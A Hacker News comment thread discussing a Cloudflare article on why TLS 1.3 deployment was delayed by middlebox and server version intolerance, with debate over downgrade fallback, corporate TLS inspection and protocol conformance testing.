
Why TLS 1.3 isn't in browsers yet - el_duderino
https://blog.cloudflare.com/why-tls-1-3-isnt-in-browsers-yet/
======
quotemstr
The ossification phenomenon happens to all sorts of APIs. Consider stat(2):
all hell would break loose if we introduced another file type for st_mode. I'm
a fan of keeping things "well oiled" by exercising extension points that are
supposed to keep working.

That said, I wish we would be more willing to force these rusted joints to
open, breakage be damned. Breaking 3% of the web sounds like a lot, but it's
not that much, especially considering that anyone broken will very quickly
upgrade.

By using elaborate workarounds described in the article, we recognize and
reward the worst technical practices. The author may not want to cast blame,
but I do.

~~~
pornel
Web breakage is a Prisoner's Dilemma. Unless all major vendors agree to break
the same thing at the same time, the one that "defects" to being compatible
with garbage will seem more reliable to users. Remember, most users don't know
what TLS is, but they care whether the page they wanted to see opens "fine" or
shows scary errors.

We've been there with CSS box model, DOM levels, (X)HTML(5), and CSS prefixes.
There have been some cases of cooperation, e.g. SHA-1 certs and kicking of bad
CAs, but most of the time browser vendors only "break" things gradually and
only when it affects < 0.1%.

~~~
0xcde4c3db
> We've been there with CSS box model, DOM levels, (X)HTML(5), and CSS
> prefixes.

Other examples:

Content-Type. There were a few years where many sites were misconfigured to
serve virtually every non-HTML file as text/plain. IE, deviating from the HTTP
spec, always used its own algorithm to detect the actual file type and thus
"worked", whereas Netscape (and later Mozilla) respected the header and would
display "garbage".

Windows-1252 mojibake. Various Windows-based authoring tools simply used the
native Windows code page 1252 to encode their text in HTML files, which were
then claimed to be encoded as ASCII or ISO 8859-1. This led to documents that
_mostly_ looked correct but would have garbage sprinkled around due to added
punctuation in Windows-1252 (primarily the distinct open/close quotes and em-
dashes, if memory serves). IE of course handled these "correctly", i.e.
interpreted ASCII or ISO 8859-1 to mean Windows-1252. I think this behavior is
now specified by HTML5 under certain conditions.

~~~
dtech
> IE of course handled these "correctly", i.e. interpreted ASCII or ISO 8859-1
> to mean Windows-1252. I think this behavior is now specified by HTML5 under
> certain conditions.

You can leave out "under certain conditions", whatwg just plain specifies the
"iso-8859-1" label identifies the windows-1252 encoding [1]

[1] [https://encoding.spec.whatwg.org/#names-and-
labels](https://encoding.spec.whatwg.org/#names-and-labels)

------
nimbius
"Middleboxes" is a pretty chicken shit definition of what are essentially
appliances that, at best, allow companies to spy on employees and at worst
enable despotic governments to target and crush dissent. My security should
not have to wait for the devices that seek to violate it.

~~~
unethical_ban
"Spy on employees" = Monitor the network activity of a sensitive, private
business network.

I'll give the same spiel I give every time proxies come up: I am a donor to
EFF, friend of privacy and the 4th amendment and I love the ACLU. I also
recognize the legitimacy and importance of MITM proxies that inspect the
content of SSL on a corporate network. It's not despotic to deploy company
assets with company root CA certs that proxy TLS traffic to make sure a random
employee isn't uploading credit card data to Box.

~~~
kodablah
> make sure a random employee isn't uploading credit card data to Box

Except you aren't making sure, and there are many ways sensitive data can be
exported. Let's be honest with ourselves here, these measures are often
implemented under the guise of security but really are just liability and risk
reduction approaches. The practical security benefit is very low IME,
especially considering the burdens these measures put on employees' ability to
work their best (and, as this article points out, burdens on others as well).

~~~
unethical_ban
Which is harder for a call center employee or server admin?

1) Upload a file via GDrive or Box 2) base64 encode the data andsend it to a
remote DNS server over the course of several days via TXT record requests

As another poster says, it's all about reduction of risk. It's about balance.
And on a corporate network that owns the workstation and server configuration,
running a root CA cert and installing it in a gold load is pretty easy for the
level of inspection and prevention it provides.

This is not the end all of security, either. It's one of many steps.

~~~
kodablah
I think it's mostly security theater without significant benefits. There are
many parallels with the TSA here. It's not about ease of implementation as
much as it's about employee trust. We shouldn't pretend that it doesn't also
scoop up personal communications. Or you can say absolutely no personal
communications using the computer you use for 8 hours a day if you're that
type of person. Many SMBs survive without these measures, yet somehow they're
sold as requirements by those with IT departments and the means. I hope
"byopc" and remote work become more popular.

~~~
unethical_ban
>Or you can say absolutely no personal communications using the computer you
use for 8 hours a day

Exactly. It's a company resource. Most people seem to have / can afford a
mobile device with cel/Wifi connectivity. Why should you feel so privileged to
go to reddit, Gmail, Box, etc. on a bank network?

------
ncmncm
This article doesn't explain why they have so much trouble with versioning a
protocol that is quite a lot simpler than many IP protocols that work. They
shouldn't need GREASE, because anybody implementing TLS should be testing
against a dedicated server, identified in the RFC, that connects as a client
and jiggles all the knobs.

What, no conformance testing address is in the RFC? There's your problem right
there.

To the conspiracy-minded among us, it is clear that "some people" don't want
progress on encrypted communications, and know just what percentage of devices
need to be intolerant of progress to stall adoption of fixes. Making browsers
treat dropped connections as part of the protocol was very convenient for
"those people". I.e., this is not (significantly) a matter of incompetent
implementers, this is an enemy attack. Deployment plans that assume good faith
by all parties fail under enemy attack.

As with everything cryptographic, a threat model is essential. Deployment is
as much a part of the system and attack surface as the ciphers.

~~~
skissane
> What, no conformance testing address is in the RFC? There's your problem
> right there.

The vast majority of RFCs don't have conformance testing suites. IETF focuses
on interoperability testing, which demonstrates that independent
implementations work together for the major use cases, it doesn't test all the
edge cases (such as future version negotiation) that a good conformance test
would.

Creating and maintaining a conformance test is an order of magnitude more work
than creating or maintaining a specification.

Someone has to be willing to expend the effort, and that usually means it has
to make economic sense, and it rarely does.

And even when it does, in order to gain funding it often has to be licensed on
commercial terms, which puts it out of reach of a lot of open source projects
and smaller commercial implementors. (Even many large companies wouldn't pay
for a test suite unless customers start putting it in RFPs.)

NIST used to maintain a whole bunch of free conformance test suites (CGM,
COBOL, FORTRAN, PHIGS, POSIX, SQL), but the US government decided to stop
paying for that.

~~~
gsnedders
The WHATWG and the W3C have been moving in a very different direction,
treating testing as a major part of spec development, because the goal is to
get implementations of the specifications, and how do you determine that if
not by testing.

[https://blog.whatwg.org/improving-
interoperability](https://blog.whatwg.org/improving-interoperability) is a
post from the WHATWG side about this, and the outcome isn't just the direct
"it's easier to write code against tests" but also "it's easier to notice when
the spec changes" (because you now get a failing test).

~~~
pas
Usually IETF WG members do testing and implementation (they run their modified
version somewhere), but no information about that becomes part of the
standard.

------
saurik
> When presented with a client hello with version 3.4, a large percentage of
> TLS 1.2-capable servers would disconnect instead of replying with 3.3.

As someone who has implemented a ton of protocols, I honestly don't understand
how anyone even does something this stupid.

~~~
cesarb
It's the "fail closed" principle in action: if I don't understand it, it must
be malicious, so the connection should be rejected as swiftly as possible.

Also seen in firewalls which drop all ICMP packets ("the only real-world use
of ICMP is ping floods, right?"), breaking PMTUD.

~~~
jchw
But this isn't fail-closed. The specification allows for newer versions. The
problem is, you are supposed to spit back the version you actually support
instead of disconnecting. I don't understand how this can be interpreted as
anything but non-compliance of the standard.

~~~
Spivak
I would say that technically it's complaint because there's nothing saying a
server can't tear down a connection whenever it wants.

Our InfoSec friends are rightfully suspicious of 'weird' looking packets and
data from clients. It's one of the few ways to catch/stop zero day vulns. It
does make things difficult when legitimate traffic is caught in the crossfire
but such is the nature of most security practices.

------
misterbowfinger
Ugh, why did they have to use Flash...

[https://tls13.mitm.watch/](https://tls13.mitm.watch/)

I know they mention it here:

> It uses Adobe Flash, because that’s the only widespread cross-platform way
> to get access to raw sockets from a browser.

But there's really no other way???

~~~
roblabla
That's actually a huge annoyance of mine. There's no stable, cross-platform
web API to get raw sockets, and I'm not sure why.

~~~
QasimK
Imagine if every webpage (JavaScript) could open sockets to any location and
port - sounds like a significant security issue.

~~~
banachtarski
They essentially can via the WebRTC api, albeit in a more cumbersome way.
There's nothing inherently insecure about it and the onus rests on the serving
party and the browser itself to ensure no foul play is happening.

~~~
lmz
Doesn't WebRTC have a handshake protocol to ensure that the other end expects
the WebRTC media stream?

~~~
banachtarski
If you allow a browser to open sockets to random places, it's the exact same
principle! The onus is on the listener to ensure that the people communicating
respect the agreed upon protocol.

~~~
tokenizerrr
Then every browser could be used to send spam. It would be horrible. Imagine
that every person who visits a compromised page immediately started sending
spam emails over smtp. Or spam irc messages.

~~~
roblabla
Flash could do that, and yet I've never heard of it as a problem.

~~~
jhgg
Generally is not a problem, as Flash needs to check a file called
"crossdomain.xml" that is served from the destination server, which specifies
how Flash can communicate with it.

[http://www.adobe.com/devnet/articles/crossdomain_policy_file...](http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html)

------
newman314
Sigh. I'm leading an effort to cleanup TLS company wide and it's a nightmare.

I get why some people want middleboxes but honestly, I'd rather TLS1.3 take
the opportunity to clean things up instead of coming up with workarounds for
fallback.

------
user5994461
>>> To help support this discussion with data, we built a tool to help check
if your network is compatible with TLS 1.3:
[https://tls13.mitm.watch/](https://tls13.mitm.watch/)

The name is so terrible that I can't tell if it's a malware or a porn site.

If anyone from cloudflare is reading, please host your project on something
legit. tls13test.cloudflare.com or whatever.

~~~
Buge
The downside of hosting things all in the same domain is that cookies are
shared between them, so a vulnerability in one site (e.g. XSS) leads to
compromise of all sites. Choosing different domains means they are sandboxed
and safe from each other.

Any domain name could be used to host porn. But not any domain name can get
linked from a cloudflare blog. I think the fact that it's linked from
cloudflare's blog should indicate that it's fine.

~~~
tombrossman
> The downside of hosting things all in the same domain is that cookies are
> shared between them, so a vulnerability in one site (e.g. XSS) leads to
> compromise of all sites. Choosing different domains means they are sandboxed
> and safe from each other.

I believe this is incorrect. Cookies should only be shared (by default) if the
domain matches exactly, which is why it's best practice to use a www subdomain
instead of the domain alone. For example, www.example.com cookies will not be
shared with test.example.com by default, though this can be enabled. See here
for a fuller explanation:
[https://stackoverflow.com/a/23086139](https://stackoverflow.com/a/23086139)

~~~
mkonecny
It is incorrect. Read why personal github pages (username.github.com) moved to
github.io (username.github.io)

[https://github.com/blog/1452-new-github-pages-domain-
github-...](https://github.com/blog/1452-new-github-pages-domain-github-io)

~~~
pas
That only allows writing cookies, but still the separation via a completely
different domain is best practice.

------
yeukhon
> There is no signal to developers that an implementation is flawed, and so
> mistakes can happen without being noticed. That is, until a new version of
> the protocol is deployed and your implementation fails, but by then the code
> is deployed and it could take years for everyone to upgrade.

> If a protocol is designed with a flexible structure, but that flexibility is
> never used in practice, some implementation is going to assume it is
> constant.

Perhaps this is a naive thought. I remember several years ago Mozilla
announced its experimental browser rendering engine (Servo) passed Acid 2
tests [1]. So why can't we come together and create such standard tests so
that server implementers and middlebox implementers are encouraged to include
them as part of their QA score?

I know this is an optional. There is no mandate, but it sounds like a start.
Isn't there some network vendor organization the major players are part of?

[1]: [https://research.mozilla.org/2014/04/17/another-big-
mileston...](https://research.mozilla.org/2014/04/17/another-big-milestone-
for-servo-acid2/)

------
snvzz
I say: Just break middleboxes. Do it well. Red padlock "TLS connection
downgraded because middlebox".

This shit shouldn't exist in the first place. Routers shouldn't look past the
layer 3 headers of the packet.

------
atesti
To me it sounds like reenabling the fallback with trying TLS1.2 after TLS1.3
fails for a connection would be the best solution to gradually upgrade all
devices.

~~~
kalleboo
The article says "Browsers did not want to re-enable the insecure downgrade
and fight the uphill battle of oiling the protocol negotiation joint again for
the next half-decade." So I guess the natural solution to that is making the
TLS protocol a User-Agent-esque nightmare of compatibility patches and
pretending to support something you don't which surely WONT come back to bite
them in the ass years down the line...

~~~
wav-part
1.2 is still secure. This downgrading/oiling is simple and works for all
future versions.

TLS is already so complex and ASN.1 makes xml look like c-struct. This begs
the question: why would anyone want to make a crypto overly complex ?

------
sloxy
site down for maintenance.. cache:
[http://webcache.googleusercontent.com/search?q=cache:BQlyePw...](http://webcache.googleusercontent.com/search?q=cache:BQlyePwWdUoJ:blog.cloudflare.com/why-
tls-1-3-isnt-in-browsers-yet/)

------
user5994461
Meanwhile, still supporting TLS 1.0 because of office 2010.

------
ori_b
It hasn't even been released yet.

~~~
QasimK
This is essentially explaining why it hasn’t been released.

------
wav-part
I dont get the crisis. If 3% disconnect with 1.3, then retry again with secure
1.2. Its only a performence penalty for those 3%. Its obviously less than
lets-talk-about-it penalty.

~~~
MaulingMonkey
The article calls this "insecure downgrade" \- which is not just the
performance penalty you say it is, it's also a security penalty that's been
previously (ab)used via POODLE. It's also code that's been removed and would
need re-implementing, re-testing, etc.

The only crisis the article mentions - in passing at that - is when they tried
to roll out 1.3 initially and things broke outright at alarmingly high rates.
Whoever wrote the article appears to be a fan of discussing things before they
turn into crisises.

~~~
wav-part
Hows downgrading to _secure 1.2_ insecure ? Regarding sslv3, why would client
ever use it, downgrade/POODLE or not ?

This is literally very simple, few lines of patch. Its basically tls server
discovery.

Its a crisis when a upgrade makes 3% webservers stop working.

~~~
rocqua
It means anyone with a MitM position gets to decide you don't have TLS 1.3 .
At that point, why even have TLS 1.3? It's not protecting you anymore than TLS
1.2 is.

~~~
wav-part
> _It means anyone with a MitM position gets to decide you don 't have TLS
> 1.3._

So what ? 1.2 is not weak. Connection is still secure.

Also MITM still gets to decide whether to have tls or not. Then "Why even have
tls ?". If MITM is blocking a protocol (or higher version, which is
equivalent), then there is nothing to be done.

~~~
rocqua
HSTS was created specifically to prevent the MITM from downgrading HTTPS to
HTTP.

As for MITM blocking a protocol, that is a noticeable situation, and one that
does not give the attacker any control over the cryptography used on sensitive
data. A downgrade attack is very different from blocking a protocol. The user
doesn't notice, and the attacker gains some control over the cryptography
used.

In the end, what sense does it make to have a TLS version an attacker can opt
out of? All you get is defence against passive MitM. Until we aren't safe
against those passive MitM with TLS 1.2 it makes no sense to rush TLS 1.3.
Especially because that rush would really hurt when it turns our TLS 1.2 is
insecure, at which point the rushed solution becomes vulnerable to all active
MitM attacks.

Now consider, what level of access to infrastructure only allows for passive
MitM?

~~~
wav-part
> _The user doesn 't notice, and the attacker gains some control over the
> cryptography used._

In my case user will because the tls client wont accept insecure version
request. Connection broken. Client will notify the user of server still using
a insecure version.

I think this might be the misunderstanding: A good client/server never
establish/accept insecure versions.

Yes MITM gets to pick but if he picks insecure version, there is no
connection.

POODLE was never attack on the protocol but poor implementations.

~~~
syncsynchalt
One misunderstanding is that you are accepting as fact that TLS 1.2 is secure,
when it's entirely plausible that one or more state actors already know that
not to be the case.

There's no magic light that goes on when the NSA breaks TLS 1.2 so that we
know to stop trusting it.

